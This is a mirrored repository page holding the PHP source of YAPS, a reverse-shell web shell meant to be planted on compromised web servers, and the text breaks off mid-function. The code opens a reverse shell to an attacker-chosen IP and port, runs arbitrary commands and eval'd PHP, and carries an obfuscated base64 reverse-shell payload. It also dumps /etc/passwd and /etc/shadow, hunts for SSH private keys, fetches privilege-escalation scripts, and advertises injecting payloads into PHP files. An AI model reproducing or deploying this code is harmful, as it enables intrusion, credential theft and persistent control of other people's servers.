mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
905 lines
34 KiB
PHP
905 lines
34 KiB
PHP
<?php
|
|
# YAPS - Yet Another PHP Shell
|
|
# Version 1.3.1 - 01/08/21
|
|
# Made by Nicholas Ferreira
|
|
# https://github.com/Nickguitar/YAPS
|
|
|
|
|
|
//error_reporting(0);
|
|
$version = "1.3.1";
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
ini_set('max_execution_time', 0);
|
|
ini_set('default_socket_timeout', pow(99, 6)); //negative timeout value should set it to infinite, but it doesn't. =(
|
|
|
|
########################## CONFIGS ############################
|
|
|
|
$resources = array(
|
|
"linpeas" => "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh",
|
|
"linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
|
|
"suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh",
|
|
"verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version",
|
|
"updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php");
|
|
|
|
$ip = '127.0.0.1';
|
|
$port = 7359;
|
|
|
|
$ps1_color = true; // colored prompt (prettier :)
|
|
$color = true; // prompt, banner, info colors (better readability)
|
|
$use_password = false; // only allows remote using the shell w/ password
|
|
// sha512("vErY_Go0d_$aLt".sha512("password123"))
|
|
$salt = 'v_3_r_Y___G_o_0_d___s_4_L_t';
|
|
$pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; // default: pass123
|
|
$auto_verify_update = false; // if true, will check on every run for update
|
|
$silent = false; //if true, does not display banner on connect
|
|
|
|
if(isset($_GET['vrfy'])) die("baguvix"); //verification
|
|
|
|
######################### END CONFIGS #########################
|
|
|
|
$yaps = $_SERVER['SCRIPT_FILENAME'];
|
|
|
|
// sets reverse socket via $_POST['x'] (stealthier, no IP on apache log request line)
|
|
if(isset($_POST['x']) && strpos($_POST['x'], ":") !== false){
|
|
$skt = explode(":", $_POST['x']);
|
|
$ip = $skt[0];
|
|
$port = $skt[1];
|
|
}
|
|
|
|
$banner = cyan('
|
|
o o O o--o o-o
|
|
\ / / \ | ) (
|
|
O o---o O--o o-o
|
|
| | | | )
|
|
o o o o o--o
|
|
Yet Another PHP Shell').'
|
|
Version '.$version.'
|
|
Coder: Nicholas Ferreira';
|
|
|
|
########################## PARSE ARGV ########################
|
|
|
|
$short_args = "u::h::s::";
|
|
$long_args = array("update::","help::","silent::");
|
|
$options = getopt($short_args, $long_args);
|
|
|
|
if(isset($options['h']) || isset($options['help'])) die(usage());
|
|
if(isset($options['u']) || isset($options['update'])) die(verify_update());
|
|
if(isset($options['s']) || isset($options['silent'])) $silent = true;
|
|
|
|
if(php_sapi_name() == "cli"){ // if yaps is run via cli, parse args
|
|
if($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc-1])){ // $ php yaps.php 127.0.0.1 4444
|
|
$port = $argv[$argc-1];
|
|
$ip = $argv[$argc-2];
|
|
}else{
|
|
foreach($argv as $arg){
|
|
if(strpos($arg, ":") !== false){ // if an argument is of the form .*:[0-9]+
|
|
$socket = explode(":", $arg);
|
|
$ip = $socket[0];
|
|
$port = (int)$socket[1];
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
##################### END ARGV PARSING ######################
|
|
|
|
$commands = array(
|
|
"all-colors",
|
|
// "backdoor",
|
|
"color",
|
|
// "download",
|
|
"duplicate",
|
|
"enum",
|
|
"help",
|
|
"infect",
|
|
"info",
|
|
"passwd",
|
|
"php",
|
|
"stabilize",
|
|
"suggester"
|
|
// "upload"
|
|
);
|
|
|
|
|
|
function green($str){
|
|
global $color;
|
|
return $color ? "\e[92m".$str."\e[0m" : $str;
|
|
}
|
|
function red($str){
|
|
global $color;
|
|
return $color ? "\e[91m".$str."\e[0m" : $str;
|
|
}
|
|
function yellow($str){
|
|
global $color;
|
|
return $color ? "\e[93m".$str."\e[0m" : $str;
|
|
}
|
|
function cyan($str){
|
|
global $color;
|
|
return $color ? "\e[96m".$str."\e[0m" : $str;
|
|
}
|
|
function white($str){
|
|
global $color;
|
|
return $color ? "\e[97m".$str."\e[0m" : $str;
|
|
}
|
|
|
|
|
|
function banner(){
|
|
global $banner;
|
|
return $banner.white('
|
|
This is ').red('NOT').white(' an interactive shell.
|
|
Use ').green('!help').white(' to see commands.');
|
|
}
|
|
|
|
function usage(){
|
|
global $banner,$version;
|
|
return $banner.'
|
|
'.yellow('Usage:').white('
|
|
There are three ways you can start the connection:
|
|
').green('1. Via command line in the compromised host;').'
|
|
E.g: $ php yaps.php [options] [ip port|ip:port]
|
|
'.green('2. Making a POST request to the file with the parameter "x";').'
|
|
E.g: $ curl -X POST -d "x=192.168.73.59:7359" hacked.com/uploads/yaps.php
|
|
'.green('3. Making a GET request without parameters (will connect to the hardcoded socket);').'
|
|
E.g: $ curl hacked.com/uploads/yaps.php
|
|
'.yellow('Options:').white('
|
|
-h, --help: Show this help
|
|
-s, --silent: Silent mode (does not display banner)
|
|
-u, --update: Check if YAPS is up to date
|
|
').yellow('Examples (suppose your IP is 192.168.73.59):').'
|
|
infected@host:~$ php yaps.php -s 192.168.73.59 4444
|
|
infected@host:~$ php yaps.php 192.168.73.59:8080
|
|
your@machine:~$ curl -X POST -d "x=192.168.73.59" hacked.com/uploads/yaps.php
|
|
';
|
|
}
|
|
|
|
function isAvailable($function){
|
|
$dis = ini_get('disable_functions');
|
|
if(!empty($dis)){
|
|
$dis = preg_replace('/[, ]+/', ',', $dis);
|
|
$dis = explode(',', $dis); // split by comma
|
|
$dis = array_map('trim', $dis); //remove whitespace at the beginning and end
|
|
}else{
|
|
$dis = array();
|
|
}
|
|
|
|
if(is_callable($function) and !in_array($function, $dis))
|
|
return true;
|
|
return false;
|
|
}
|
|
|
|
|
|
function help(){
|
|
|
|
$help = '
|
|
'.green('Useful commands:').'
|
|
'.cyan('!help').'
|
|
Display this menu
|
|
'.cyan('!all-colors').'
|
|
Toggle all colors (locally only)
|
|
'.cyan('!color').'
|
|
Toggle $PS1 color (locally only)
|
|
'.cyan('!duplicate').'
|
|
Spawn another reverse shell
|
|
'.cyan('!enum').'
|
|
Download Linpeas and Linenum to /tmp and get it ready to run
|
|
'.cyan('!infect').'
|
|
Inject payloads into PHP files
|
|
'.cyan('!info').'
|
|
List information about target
|
|
'./*cyan('!download <target file>').'
|
|
Downloads file from target to your PC
|
|
'.cyan('!upload <source> <destination>').'
|
|
Uploads a source file from your PC to target destination folder
|
|
'.*/cyan('!passwd').'
|
|
Show options for password
|
|
'.cyan('!php').'
|
|
Write and run PHP code on the remote host
|
|
'.cyan('!stabilize').'
|
|
Stabilize to an interactive shell
|
|
'.cyan('!suggester').'
|
|
Download Linux Exploit Suggester to /tmp and get it ready to run
|
|
|
|
'.green('Command line options:').'
|
|
'.white('$ php yaps.php [--update|-u]').'
|
|
Check if YAPS is up to date
|
|
'.white('$ php yaps.php ip port').'
|
|
Connect to ip:port
|
|
';
|
|
return $help;
|
|
}
|
|
|
|
function run_cmd($c){ // modified from msf
|
|
|
|
$c = $c." 2>&1\n"; // stderr to stdout
|
|
|
|
if(isAvailable('exec')){
|
|
$stdout = array();
|
|
exec($c, $stdout);
|
|
$stdout = join(chr(10),$stdout).chr(10);
|
|
}else if(isAvailable('shell_exec')){
|
|
$stdout = shell_exec($c);
|
|
}else if(isAvailable('popen')){
|
|
$fp = popen($c, 'r');
|
|
$stdout = NULL;
|
|
if(is_resource($fp))
|
|
while (!feof($fp))
|
|
$stdout .= fread($fp, 1024);
|
|
@pclose($fp);
|
|
}else if(isAvailable('passthru')){
|
|
ob_start();
|
|
passthru($c);
|
|
$stdout = ob_get_contents();
|
|
ob_end_clean();
|
|
}else if(isAvailable('proc_open')){
|
|
$handle = proc_open($c, array(
|
|
array('pipe','r') ,
|
|
array('pipe','w') ,
|
|
array('pipe','w')
|
|
) , $pipes);
|
|
$stdout = NULL;
|
|
while (!feof($pipes[1]))
|
|
$stdout .= fread($pipes[1], 1024);
|
|
@proc_close($handle);
|
|
}else if(isAvailable('system')){
|
|
ob_start();
|
|
system($c);
|
|
$stdout = ob_get_contents();
|
|
ob_end_clean();
|
|
}else{
|
|
$stdout = 0;
|
|
}
|
|
return $stdout;
|
|
}
|
|
|
|
$ps1 = "[YAPS] ".str_replace(PHP_EOL,"",green(run_cmd("whoami")."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
|
|
|
|
function sysinfo(){
|
|
global $s;
|
|
fwrite($s,green("\n====================== Initial info ======================\n\n"));
|
|
$info = cyan("[i] OS info:\n").run_cmd("lsb_release -a | grep -v 'No LSB'").PHP_EOL;
|
|
|
|
$info .= cyan("[i] Hostname: ").run_cmd("hostname");
|
|
$info .= cyan("[i] Kernel: ").run_cmd("uname -a");
|
|
$info .= cyan("[i] CPU: \n").run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'");
|
|
$info .= cyan("[i] RAM: \n").run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'");
|
|
$info .= cyan("[i] Sudo version: ").run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3");
|
|
$info .= cyan("[i] User/groups: ").run_cmd("id").PHP_EOL;
|
|
$info .= cyan("[i] Active TTY: \n").run_cmd("w").PHP_EOL;
|
|
fwrite($s, $info);
|
|
|
|
fwrite($s,green("====================== Users info ======================\n\n"));
|
|
$info = cyan("[i] Current user: ").run_cmd("whoami");
|
|
$info .= cyan("[i] Users in /home: \n").run_cmd("ls /home").PHP_EOL;
|
|
$info .= cyan("[i] Crontab of current user: \n").run_cmd("crontab -l | egrep -v '^#'").PHP_EOL;
|
|
$info .= cyan("[i] Crontab: \n").run_cmd("cat /etc/crontab | egrep -v '^#'").PHP_EOL;
|
|
fwrite($s, $info);
|
|
|
|
fwrite($s,green("====================== All users ======================\n\n"));
|
|
fwrite($s, run_cmd("cat /etc/passwd").PHP_EOL);
|
|
if(is_readable("/etc/shadow"))
|
|
fwrite($s, red("[!] /etc/shadow is readable!\n").run_cmd("cat /etc/shadow").PHP_EOL);
|
|
|
|
fwrite($s, green("====================== Net info ======================\n\n"));
|
|
$info = cyan("[i] IP Info: \n").run_cmd("ifconfig").PHP_EOL;
|
|
$info .= cyan("[i] Hosts: \n").run_cmd("cat /etc/hosts | grep -v '^#'").PHP_EOL; // /etc/hosts file
|
|
$info .= cyan("[i] Interfaces/routes: \n").run_cmd("cat /etc/networks && route").PHP_EOL;
|
|
$info .= cyan("[i] IP Tables rules: \n").run_cmd("(iptables --list-rules 2>/dev/null)").PHP_EOL;
|
|
$info .= cyan("[i] Active ports: \n").run_cmd("(netstat -punta) 2>/dev/null").PHP_EOL; //established, listening, 0.0.0.0, 127.0.0.1
|
|
fwrite($s, $info);
|
|
|
|
fwrite($s, green("====================== Interesting binaries ======================\n\n"));
|
|
$interesting_binaries = array('nc','nc.traditional','ncat','nmap','perl','python','python2','python2.6','python2.7','python3','python3.6','python3.7','ruby','node','gcc','g++','docker','php');
|
|
foreach($interesting_binaries as $binary) {
|
|
$binary = shell_exec("which $binary 2>/dev/null");
|
|
if($binary !== "" && base64_encode($binary.PHP_EOL) !== "Cg==") // if not empty or newline
|
|
fwrite($s, run_cmd("ls -l $binary"));
|
|
}
|
|
|
|
fwrite($s, green("\n====================== SUID binaries ======================\n\n"));
|
|
$suid_list = explode("\n",shell_exec("find / -type f -perm /4000 2>/dev/null"));
|
|
foreach($suid_list as $suid)
|
|
if($suid !== "")
|
|
fwrite($s, run_cmd("ls -l $suid"));
|
|
|
|
fwrite($s, green("\n====================== SSH files ======================\n\n"));
|
|
$authorized_keys = explode("\n",shell_exec("find / -type f -name authorized_keys 2>/dev/null")); // search for authorized_keys file
|
|
foreach($authorized_keys as $public_key)
|
|
if(is_writable($public_key))
|
|
fwrite($s, red("[Writable] ").$public_key.PHP_EOL);
|
|
else
|
|
fwrite($s, $public_key.PHP_EOL);
|
|
$id_rsa = explode("\n",shell_exec("find / -type f -name id_rsa 2>/dev/null")); // search for id_rsa files
|
|
foreach($id_rsa as $priv_key)
|
|
if(is_readable($priv_key))
|
|
fwrite($s, red("[Readable] ").$priv_key.PHP_EOL);
|
|
else
|
|
fwrite($s, $priv_key.PHP_EOL);
|
|
|
|
fwrite($s, green("\n=================== Writable PHP files ===================\n\n"));
|
|
$webfiles_arr = array();
|
|
$webdir = array('/var/www','/srv','/usr/local/apache2','/var/apache2','/var/www/nginx-default');
|
|
foreach($webdir as $dir)
|
|
$webfiles_arr = array_merge($webfiles_arr, explode("\n", shell_exec("find ".$dir." -type f -name '*.php*' -writable 2>/dev/null")));
|
|
|
|
|
|
if(count($webfiles_arr) > 25){
|
|
for($i=0;$i<25;$i++)
|
|
if($webfiles_arr[$i] !== "")
|
|
fwrite($s, red("[Writable] ").$webfiles_arr[$i].PHP_EOL);
|
|
fwrite($s, "...\n...".PHP_EOL);
|
|
fwrite($s, green("[+] "). "Showing only the first 25 files. There are more!".PHP_EOL);
|
|
}else{
|
|
foreach($webfiles_arr as $file)
|
|
if($file !== "")
|
|
fwrite($s, red("[Writable] ").$file.PHP_EOL);
|
|
}
|
|
fwrite($s, cyan("\n[i]")." Get more information with !enum.".PHP_EOL);
|
|
}
|
|
|
|
function random_name($name = ""){
|
|
$charset = implode("",array_merge(range("A", "Z"), range("a","z"), range(0,9))); // merge arrays and join them into a string
|
|
for($i=0;$i<=mt_rand(5,6);$i++)
|
|
$name .= $charset[mt_rand(0,strlen($charset)-1)];
|
|
return $name;
|
|
}
|
|
|
|
function download($url, $saveTo){ //download file from $url to $saveTo
|
|
$randomName = random_name();
|
|
$content = get_request($url);
|
|
|
|
if(isAvailable('file_put_contents'))
|
|
if(file_put_contents($saveTo."/".$randomName,$content)) return $randomName;
|
|
if(isAvailable('fopen') && isAvailable('fwrite') && isAvailable('fclose')){
|
|
$fp = fopen($saveTo."/".$randomName, "w");
|
|
if(fwrite($fp, $content)){
|
|
fclose($fp);
|
|
return $randomName;
|
|
}
|
|
}
|
|
return false;
|
|
}
|
|
|
|
function enum(){ //download linpeas, save to /tmp and change its permission to 777
|
|
global $s, $resources;
|
|
$downloadLinpeas = download($resources["linpeas"], "/tmp/");
|
|
$downloadLinenum = download($resources["linenum"], "/tmp");
|
|
if($downloadLinpeas){
|
|
fwrite($s, green("[+]")." Linpeas saved to /tmp/".$downloadLinpeas.cyan("\n[i] Changing permissions...\n"));
|
|
if(chmod("/tmp/".$downloadLinpeas, 777))
|
|
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinpeas." | tee /tmp/linpeas.log\n\n"));
|
|
else
|
|
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinpeas."\n\n"));
|
|
}
|
|
if($downloadLinenum){
|
|
fwrite($s, green("[+] Linenum saved to /tmp/".$downloadLinenum).cyan("\n[i] Changing permissions...\n"));
|
|
if(chmod("/tmp/".$downloadLinenum, 777))
|
|
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$downloadLinenum." | tee /tmp/linenum.log\n"));
|
|
else
|
|
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$downloadLinenum."\n"));
|
|
}
|
|
}
|
|
|
|
function suggester(){//download linux exploit suggester, save to /tmp and change its permission to 777
|
|
global $s, $resources;
|
|
$download = download($resources["suggester"], "/tmp/");
|
|
if($download){
|
|
fwrite($s, green("[+]")." Linux Exploit Suggester saved to /tmp/".$download.cyan("\n[i]")." Changing permissions...\n");
|
|
if(chmod("/tmp/".$download, 777))
|
|
fwrite($s, green("[+]")." Permissions changed! \n[i] You can run it with ".yellow("sh /tmp/".$download." | tee /tmp/LES.log\n"));
|
|
else
|
|
fwrite($s, yellow("[!]")." Couldn't change permissions... \n[i] File was saved in ".yellow("/tmp/".$download."\n"));
|
|
}
|
|
return;
|
|
}
|
|
|
|
function refresh_ps1($changecolor=false){ //build a nice PS1, toggle between colored and not colored
|
|
global $ps1_color,$ps1;
|
|
$user = str_replace(PHP_EOL, "", run_cmd("whoami"));
|
|
|
|
if(!$ps1_color){
|
|
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",green($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."$ "); // user@hostname:~$
|
|
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",red($user."@".run_cmd("hostname")).":".cyan(run_cmd("pwd"))."# "); // root@hostname:~#
|
|
if($changecolor) $ps1_color = true;
|
|
}else{
|
|
$ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."$ "); // user@hostname:~$
|
|
if($user == "root") $ps1 = white("[YAPS] ").str_replace(PHP_EOL,"",$user."@".run_cmd("hostname").":".run_cmd("pwd")."# "); // root@hostname:~#
|
|
if($changecolor) $ps1_color = false;
|
|
}
|
|
}
|
|
|
|
function getPHP(){ //receive PHP code via socket
|
|
global $s;
|
|
$php = '';
|
|
fwrite($s, cyan("[*]")." Write your PHP code (*without* PHP tags). To send and run it, use ".green("!php").". ".yellow("\n[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.").white("\nphp> "));
|
|
while($c = fread($s, 4096)){
|
|
if(substr($c,0,-1) == "!php") // remove newline at end
|
|
return $php;
|
|
if(substr($c,0,-1) == "!cancel") // remove newline at end
|
|
return 0;
|
|
fwrite($s, white("php> ")); //prompt
|
|
$php .= $c; // append received line to the whole php code to be executed
|
|
}
|
|
return $php;
|
|
}
|
|
|
|
function runPHP($code){ // guess what
|
|
try{
|
|
ob_start();
|
|
eval($code); // do the magic
|
|
$result = ob_get_contents(); //get buffer from eval() to return later
|
|
ob_end_clean();
|
|
}catch (Throwable $ex){
|
|
$err = explode("Stack trace:", $ex);
|
|
$result = $err[0]; //return the error
|
|
}
|
|
return $result;
|
|
}
|
|
|
|
function stabilize($post_socket=""){ // spawn an interactive shell
|
|
global $s, $port, $ip;
|
|
|
|
$payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ4KSk7fSBmY2xvc2UoJHNvY2spO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBmY2xvc2UoJHApO3Byb2NfY2xvc2UoJHByb2Nlc3MpOw==";// modified php-reverse-shell (works w/ sudo, mysql, ftp, su, etc.)
|
|
|
|
if(strlen($post_socket) > 1 && strlen($post_socket) > 0){ //if is set
|
|
echo $post_socket;
|
|
$skt = explode(":", $post_socket);
|
|
$post_ip = $skt[0];
|
|
$post_port = $skt[1];
|
|
$final_payload = base64_encode(str_replace("IP_ADDR", $post_ip, str_replace("PORT", $post_port, base64_decode($payload)))); // changes payload to add correct socket
|
|
shell_exec("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);'");
|
|
return;
|
|
}
|
|
|
|
fwrite($s, yellow("[i]")." Set up a listener on another port (nc -lnvp <port>) and press ENTER.\nChoose a port: ");
|
|
while($c = fread($s, 8)){ //reads [ENTER]
|
|
if(strlen($c) > 0){ // got [ENTER]
|
|
$recv_port = (int)$c; // get the integer part
|
|
if($recv_port>65535 || $recv_port==0){
|
|
fwrite($s,red("[-]")." Port must be between 0-65535.\nChoose another port: ");
|
|
}else{
|
|
$final_payload = base64_encode(str_replace("IP_ADDR", $ip, str_replace("PORT", $recv_port, base64_decode($payload)))); // changes payload to add correct socket
|
|
fwrite($s, yellow("[i]")." Trying to connect to $ip:$recv_port\n");
|
|
|
|
if(isAvailable("popen") && isAvailable("pclose")){
|
|
pclose(popen("echo ".$final_payload."| base64 -d | php -r '\$stdin=file(\"php://stdin\");eval(\$stdin[0]);' &",'r')); // does the magic
|
|
return;
|
|
}
|
|
// in case we don't have popen or pclose
|
|
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
|
|
run_cmd("timeout --kill-after 0 1 wget --post-data=\"x=$ip:$recv_port&stabilize=1\" $curl_url > /dev/null"); // thx znttfox =)
|
|
return;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
function backdoor(){
|
|
// todo
|
|
}
|
|
|
|
function check_password(){ //ask for password and return 0 or 1
|
|
global $s, $pass_hash, $salt;
|
|
fwrite($s, yellow("[i] ")."This shell is protected. \nEnter the password: ");
|
|
while($data = fread($s,1024)){
|
|
$entered_pass = substr($data,0,-1); //remove newline at end
|
|
return hash("sha512", $salt.hash("sha512",$entered_pass, false), false) == $pass_hash ? true : false;
|
|
}
|
|
}
|
|
|
|
function change_password($new){
|
|
global $salt, $yaps, $s;
|
|
$new_hash = hash("sha512", $salt.hash("sha512",$new, false), false);
|
|
if(!is_readable($yaps) || !is_writable($yaps)) return false; //someone changed the permission
|
|
$yaps_code = file_get_contents($yaps);
|
|
$new_yaps_code = preg_replace('/[a-f0-9]{128}/', $new_hash, $yaps_code, 1); // the password hash is be the first thing this regex should match
|
|
if(file_put_contents($yaps, $new_yaps_code)){
|
|
fwrite($s, green("[+] ")."Password changed. Changes will take effect on next connection.\n");
|
|
return true;
|
|
}else{
|
|
fwrite($s, red("[-] ")."Couldn't read or write the file. Are the permissions right?\n" . run_cmd("ls -l ".$yaps."\n"));
|
|
return false;
|
|
}
|
|
}
|
|
|
|
function toggle_password(){
|
|
global $use_password, $s, $yaps;
|
|
$yaps_code = file_get_contents($yaps);
|
|
if($use_password){ //password currently active
|
|
$new_yaps_code = preg_replace('/(\$use_password += +)(true)/', '$1false', $yaps_code, 1);
|
|
if(file_put_contents($yaps, $new_yaps_code)){
|
|
$use_password = false;
|
|
fwrite($s, green("[+] ")."Password deactivated.\n");
|
|
return true;
|
|
}
|
|
fwrite($s, red("[-] ")."Couldn't deactivate password.\n");
|
|
return false;
|
|
}
|
|
// will enter here if $use_password is false
|
|
$new_yaps_code = preg_replace('/(\$use_password += +)(false)/', '$1true', $yaps_code, 1); //limit must be 1
|
|
if(file_put_contents($yaps, $new_yaps_code)){
|
|
$use_password = false; // if limit isn't 1, this will be changed to false too
|
|
fwrite($s, green("[+] ")."Password activated.\n");
|
|
return true;
|
|
}
|
|
fwrite($s, red("[-] ")."Couldn't activate password.\n");
|
|
return false;
|
|
}
|
|
|
|
function passwd(){
|
|
global $s,$use_password;
|
|
if($use_password){
|
|
if(!check_password()){
|
|
fwrite($s, red("[-] ")." Wrong password\n");
|
|
return;
|
|
}
|
|
fwrite($s, green("[+] Password is enabled. ").white("Choose an option:")."\n[1] Change password\n[2] Disable password\n[3] Cancel\n> ");
|
|
while($data = fread($s, 8)){
|
|
switch(substr($data, 0, -1)){
|
|
case "1": // change password
|
|
fwrite($s,cyan("[*] ")."Choose the new password: ");
|
|
while($data2 = fread($s, 1024)){
|
|
$newPass = substr($data2, 0, -1); //remove newline at end
|
|
change_password($newPass);
|
|
return;
|
|
}
|
|
break;
|
|
|
|
case "2": // disable password
|
|
toggle_password();
|
|
return;
|
|
break;
|
|
|
|
default:
|
|
fwrite($s, cyan("[*] ")."Canceled.\n");
|
|
return;
|
|
break;
|
|
}
|
|
}
|
|
}else{ // no password required
|
|
fwrite($s, yellow("[!] Password is disabled. ").white("Choose an option:")."\n[1] Set a password\n[2] Enable password\n[3] Cancel\n> ");
|
|
while($data = fread($s, 8)){
|
|
switch(substr($data, 0, -1)){
|
|
case "1": // set a new password
|
|
fwrite($s,cyan("[*] ")."Choose the new password: ");
|
|
while($data2 = fread($s, 1024)){
|
|
$newPass = substr($data2, 0, -1); //remove newline at end
|
|
change_password($newPass);
|
|
return;
|
|
}
|
|
break;
|
|
|
|
case "2": // enable password
|
|
toggle_password();
|
|
return;
|
|
break;
|
|
|
|
default:
|
|
fwrite($s, cyan("[*] ")."Canceled.\n");
|
|
return;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
function duplicate(){
|
|
global $s,$ip,$port,$_SERVER;
|
|
|
|
if(!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])){
|
|
fwrite($s, yellow("[-] ")."Couldn't find YAPS URL. Did you run me via command line?\nPlease provide the correct YAPS URL (example.com/files/yaps.php): ");
|
|
while($yaps_url = fread($s, 256)){
|
|
if(get_request(preg_replace("/\n/", "",$yaps_url."?vrfy")) !== "baguvix")
|
|
return fwrite($s, red("[-] ")."Couldn't validade YAPS URL. Is this the correct URL?\n");
|
|
break;
|
|
}
|
|
$curl_url = $yaps_url;
|
|
}else{
|
|
$curl_url = $_SERVER["REQUEST_SCHEME"]."://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; // htt(p|ps) :// website.com /files/yaps.php
|
|
echo $curl_url;
|
|
}
|
|
|
|
fwrite($s, cyan("[*] ")."Choose a port to listen (default: $port): ");
|
|
|
|
while($new_port = fread($s, 32)){
|
|
$new_port = (base64_encode($new_port) == "Cg==") ? $port: substr($new_port,0,-1); //if new_port= newline, new_port = old port
|
|
$socket = array('x' => $ip.":".$new_port);
|
|
fwrite($s, "Connecting to ".$ip.":".$new_port."\n");
|
|
$cmd = "wget -qO- --post-data=\"".http_build_query($socket)."\" $curl_url > /dev/null";
|
|
if(isAvailable("popen") && isAvailable("pclose"))
|
|
pclose(popen($cmd." &",'r')); // doesn't wait for wget to return
|
|
else
|
|
run_cmd("timeout --kill-after 0 1 ".$cmd); // thx znttfox =)
|
|
return;
|
|
}
|
|
}
|
|
|
|
function get_request($url){ //todo: change download function
|
|
$response = false;
|
|
if(isAvailable("file_get_contents")){
|
|
$response = file_get_contents($url);
|
|
}elseif(isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")){
|
|
$response = fread(fopen($url, "r"),10);
|
|
}elseif(in_array("curl",get_loaded_extensions())){
|
|
$ch = curl_init();
|
|
curl_setopt($ch, CURLOPT_URL, $url);
|
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
|
$response = curl_exec($ch);
|
|
curl_close($ch);
|
|
}elseif($tmp_curl = run_cmd("curl -s ".$url)){
|
|
$response = $tmp_curl;
|
|
}elseif($tmp_wget = run_cmd("wget -qO- ".$url)){
|
|
$response = $tmp_wget;
|
|
}
|
|
return $response;
|
|
}
|
|
|
|
function verify_update(){
|
|
global $version, $resources;
|
|
$newest_version = 0;
|
|
echo cyan("[i] ")."Your version: $version. Checking for updates...\n";
|
|
$request = get_request($resources["verifyUpdateURL"]);
|
|
if($request) $newest_version = $request;
|
|
|
|
$newest_version_ = (int)str_replace(".","",$newest_version); //get only numbers
|
|
